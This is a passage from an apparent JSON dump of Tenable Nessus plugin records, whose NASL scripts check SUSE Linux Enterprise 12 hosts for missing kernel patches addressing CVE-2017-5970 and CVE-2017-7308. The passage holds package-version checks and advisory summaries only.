"#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2017:0770-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(97848);\n script_version(\"3.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2017-5970\");\n\n script_name(english:\"SUSE SLES12 Security Update : kernel (SUSE-SU-2017:0770-1)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for the Linux Kernel 3.12.60-52_57 fixes one issue. The\nfollowing security bug was fixed :\n\n - CVE-2017-5970: The ipv4_pktinfo_prepare function in\n net/ipv4/ip_sockglue.c in the Linux kernel allowed\n attackers to cause a denial of service (system crash)\n via (1) an application that made crafted system calls or\n possibly (2) IPv4 traffic with invalid IP options\n (bsc#1025013).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1025013\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-5970/\"\n );\n # https://www.suse.com/support/update/announcement/2017/suse-su-20170770-1/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?6ab851ef\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"To install this SUSE Security Update use YaST online_update.\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Server for SAP 12:zypper in -t patch\nSUSE-SLE-SAP-12-2017-422=1\n\nSUSE Linux Enterprise Server 12-LTSS:zypper in -t patch\nSUSE-SLE-SERVER-12-2017-422=1\n\nTo bring your system up-to-date, use 'zypper patch'.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kgraft-patch-3_12_60-52_57-default\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kgraft-patch-3_12_60-52_57-xen\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:12\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/02/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/03/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/03/21\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLES12)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLES12\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\nif (cpu >!< \"x86_64\") audit(AUDIT_ARCH_NOT, \"x86_64\", cpu);\n\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES12\" && (! preg(pattern:\"^(0)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES12 SP0\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES12\", sp:\"0\", cpu:\"x86_64\", reference:\"kgraft-patch-3_12_60-52_57-default-4-2.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", cpu:\"x86_64\", reference:\"kgraft-patch-3_12_60-52_57-xen-4-2.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel\");\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2021-01-07T14:25:29", "description": "The SUSE Linux Enterprise 12 SP1 kernel was updated to fix the\nfollowing two issues :\n\n - CVE-2017-5970: Remote attackers could have potentially\n caused a denial of service by sending bad IP options on\n a socket (bsc#1024938)\n\n - Fix a regression in MD RAID1 which could have caused\n wrong data to be read (bsc#1020048)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 27, "cvss3": {"score": 7.5, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"}, "published": "2017-02-21T00:00:00", "title": "SUSE SLED12 / SLES12 Security Update : kernel (SUSE-SU-2017:0517-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-5970"], "modified": "2017-02-21T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:kernel-default-debugsource", "cpe:/o:novell:suse_linux:12", "p-cpe:/a:novell:suse_linux:kernel-syms", "p-cpe:/a:novell:suse_linux:kernel-default-base-debuginfo", "p-cpe:/a:novell:suse_linux:kernel-default-base", "p-cpe:/a:novell:suse_linux:kernel-default-extra", "p-cpe:/a:novell:suse_linux:kernel-xen", "p-cpe:/a:novell:suse_linux:kernel-xen-debuginfo", "p-cpe:/a:novell:suse_linux:kernel-xen-debugsource", "p-cpe:/a:novell:suse_linux:kernel-xen-base", "p-cpe:/a:novell:suse_linux:kernel-default-debuginfo", "p-cpe:/a:novell:suse_linux:kernel-default-extra-debuginfo", "p-cpe:/a:novell:suse_linux:kernel-default-devel", "p-cpe:/a:novell:suse_linux:kernel-default-man", "p-cpe:/a:novell:suse_linux:kernel-default", "p-cpe:/a:novell:suse_linux:kernel-xen-base-debuginfo", "p-cpe:/a:novell:suse_linux:kernel-xen-devel"], "id": "SUSE_SU-2017-0517-1.NASL", "href": "https://www.tenable.com/plugins/nessus/97298", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2017:0517-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(97298);\n script_version(\"3.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2017-5970\");\n\n script_name(english:\"SUSE SLED12 / SLES12 Security Update : kernel (SUSE-SU-2017:0517-1)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The SUSE Linux Enterprise 12 SP1 kernel was updated to fix the\nfollowing two issues :\n\n - CVE-2017-5970: Remote attackers could have potentially\n caused a denial of service by sending bad IP options on\n a socket (bsc#1024938)\n\n - Fix a regression in MD RAID1 which could have caused\n wrong data to be read (bsc#1020048)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1020048\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1024938\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-5970/\"\n );\n # https://www.suse.com/support/update/announcement/2017/suse-su-20170517-1/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?12f25710\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"To install this SUSE Security Update use YaST online_update.\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Workstation Extension 12-SP1:zypper in -t patch\nSUSE-SLE-WE-12-SP1-2017-267=1\n\nSUSE Linux Enterprise Software Development Kit 12-SP1:zypper in -t\npatch SUSE-SLE-SDK-12-SP1-2017-267=1\n\nSUSE Linux Enterprise Server 12-SP1:zypper in -t patch\nSUSE-SLE-SERVER-12-SP1-2017-267=1\n\nSUSE Linux Enterprise Module for Public Cloud 12:zypper in -t patch\nSUSE-SLE-Module-Public-Cloud-12-2017-267=1\n\nSUSE Linux Enterprise Live Patching 12:zypper in -t patch\nSUSE-SLE-Live-Patching-12-2017-267=1\n\nSUSE Linux Enterprise Desktop 12-SP1:zypper in -t patch\nSUSE-SLE-DESKTOP-12-SP1-2017-267=1\n\nTo bring your system up-to-date, use 'zypper patch'.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default-base-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default-extra\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default-extra-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default-man\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-syms\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-xen\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-xen-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-xen-base-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-xen-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-xen-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-xen-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:12\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/02/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/02/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/02/21\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLED12|SLES12)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLED12 / SLES12\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES12\" && (! preg(pattern:\"^(1)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES12 SP1\", os_ver + \" SP\" + sp);\nif (os_ver == \"SLED12\" && (! preg(pattern:\"^(1)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLED12 SP1\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES12\", sp:\"1\", cpu:\"x86_64\", reference:\"kernel-xen-3.12.69-60.64.32.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", cpu:\"x86_64\", reference:\"kernel-xen-base-3.12.69-60.64.32.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", cpu:\"x86_64\", reference:\"kernel-xen-base-debuginfo-3.12.69-60.64.32.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", cpu:\"x86_64\", reference:\"kernel-xen-debuginfo-3.12.69-60.64.32.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", cpu:\"x86_64\", reference:\"kernel-xen-debugsource-3.12.69-60.64.32.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", cpu:\"x86_64\", reference:\"kernel-xen-devel-3.12.69-60.64.32.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", cpu:\"s390x\", reference:\"kernel-default-man-3.12.69-60.64.32.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"kernel-default-3.12.69-60.64.32.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"kernel-default-base-3.12.69-60.64.32.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"kernel-default-base-debuginfo-3.12.69-60.64.32.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"kernel-default-debuginfo-3.12.69-60.64.32.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"kernel-default-debugsource-3.12.69-60.64.32.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"kernel-default-devel-3.12.69-60.64.32.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"kernel-syms-3.12.69-60.64.32.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"1\", cpu:\"x86_64\", reference:\"kernel-default-3.12.69-60.64.32.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"1\", cpu:\"x86_64\", reference:\"kernel-default-debuginfo-3.12.69-60.64.32.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"1\", cpu:\"x86_64\", reference:\"kernel-default-debugsource-3.12.69-60.64.32.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"1\", cpu:\"x86_64\", reference:\"kernel-default-devel-3.12.69-60.64.32.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"1\", cpu:\"x86_64\", reference:\"kernel-default-extra-3.12.69-60.64.32.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"1\", cpu:\"x86_64\", reference:\"kernel-default-extra-debuginfo-3.12.69-60.64.32.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"1\", cpu:\"x86_64\", reference:\"kernel-syms-3.12.69-60.64.32.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"1\", cpu:\"x86_64\", reference:\"kernel-xen-3.12.69-60.64.32.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"1\", cpu:\"x86_64\", reference:\"kernel-xen-debuginfo-3.12.69-60.64.32.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"1\", cpu:\"x86_64\", reference:\"kernel-xen-debugsource-3.12.69-60.64.32.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"1\", cpu:\"x86_64\", reference:\"kernel-xen-devel-3.12.69-60.64.32.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel\");\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2021-01-07T14:25:35", "description": "This update for the Linux Kernel 3.12.61-52_66 fixes one issue. The\nfollowing security bug was fixed :\n\n - CVE-2017-5970: The ipv4_pktinfo_prepare function in\n net/ipv4/ip_sockglue.c in the Linux kernel allowed\n attackers to cause a denial of service (system crash)\n via (1) an application that made crafted system calls or\n possibly (2) IPv4 traffic with invalid IP options\n (bsc#1025013).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 26, "cvss3": {"score": 7.5, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"}, "published": "2017-03-21T00:00:00", "title": "SUSE SLES12 Security Update : kernel (SUSE-SU-2017:0780-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-5970"], "modified": "2017-03-21T00:00:00", "cpe": ["cpe:/o:novell:suse_linux:12", "p-cpe:/a:novell:suse_linux:kgraft-patch-3_12_61-52_66-default", "p-cpe:/a:novell:suse_linux:kgraft-patch-3_12_61-52_66-xen"], "id": "SUSE_SU-2017-0780-1.NASL", "href": "https://www.tenable.com/plugins/nessus/97851", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2017:0780-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(97851);\n script_version(\"3.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2017-5970\");\n\n script_name(english:\"SUSE SLES12 Security Update : kernel (SUSE-SU-2017:0780-1)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for the Linux Kernel 3.12.61-52_66 fixes one issue. The\nfollowing security bug was fixed :\n\n - CVE-2017-5970: The ipv4_pktinfo_prepare function in\n net/ipv4/ip_sockglue.c in the Linux kernel allowed\n attackers to cause a denial of service (system crash)\n via (1) an application that made crafted system calls or\n possibly (2) IPv4 traffic with invalid IP options\n (bsc#1025013).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1025013\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-5970/\"\n );\n # https://www.suse.com/support/update/announcement/2017/suse-su-20170780-1/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?2664210c\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"To install this SUSE Security Update use YaST online_update.\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Server for SAP 12:zypper in -t patch\nSUSE-SLE-SAP-12-2017-437=1\n\nSUSE Linux Enterprise Server 12-LTSS:zypper in -t patch\nSUSE-SLE-SERVER-12-2017-437=1\n\nTo bring your system up-to-date, use 'zypper patch'.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kgraft-patch-3_12_61-52_66-default\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kgraft-patch-3_12_61-52_66-xen\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:12\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/02/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/03/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/03/21\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLES12)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLES12\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\nif (cpu >!< \"x86_64\") audit(AUDIT_ARCH_NOT, \"x86_64\", cpu);\n\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES12\" && (! preg(pattern:\"^(0)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES12 SP0\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES12\", sp:\"0\", cpu:\"x86_64\", reference:\"kgraft-patch-3_12_61-52_66-default-2-2.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", cpu:\"x86_64\", reference:\"kgraft-patch-3_12_61-52_66-xen-2-2.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel\");\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2021-01-07T14:25:47", "description": "This update for the Linux Kernel 3.12.61-52_66 fixes several issues.\nThe following security bugs were fixed :\n\n - CVE-2017-7308: The packet_set_ring function in\n net/packet/af_packet.c in the Linux kernel did not\n properly validate certain block-size data, which allowed\n local users to cause a denial of service (overflow) or\n possibly have unspecified other impact via crafted\n system calls (bsc#1030575, bsc#1031660).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 32, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-05-16T00:00:00", "title": "SUSE SLES12 Security Update : kernel (SUSE-SU-2017:1302-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-7308"], "modified": "2017-05-16T00:00:00", "cpe": ["cpe:/o:novell:suse_linux:12", "p-cpe:/a:novell:suse_linux:kgraft-patch-3_12_61-52_66-default", "p-cpe:/a:novell:suse_linux:kgraft-patch-3_12_61-52_66-xen"], "id": "SUSE_SU-2017-1302-1.NASL", "href": "https://www.tenable.com/plugins/nessus/100215", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2017:1302-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(100215);\n script_version(\"3.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2017-7308\");\n\n script_name(english:\"SUSE SLES12 Security Update : kernel (SUSE-SU-2017:1302-1)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for the Linux Kernel 3.12.61-52_66 fixes several issues.\nThe following security bugs were fixed :\n\n - CVE-2017-7308: The packet_set_ring function in\n net/packet/af_packet.c in the Linux kernel did not\n properly validate certain block-size data, which allowed\n local users to cause a denial of service (overflow) or\n possibly have unspecified other impact via crafted\n system calls (bsc#1030575, bsc#1031660).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1030575\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1031660\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-7308/\"\n );\n # 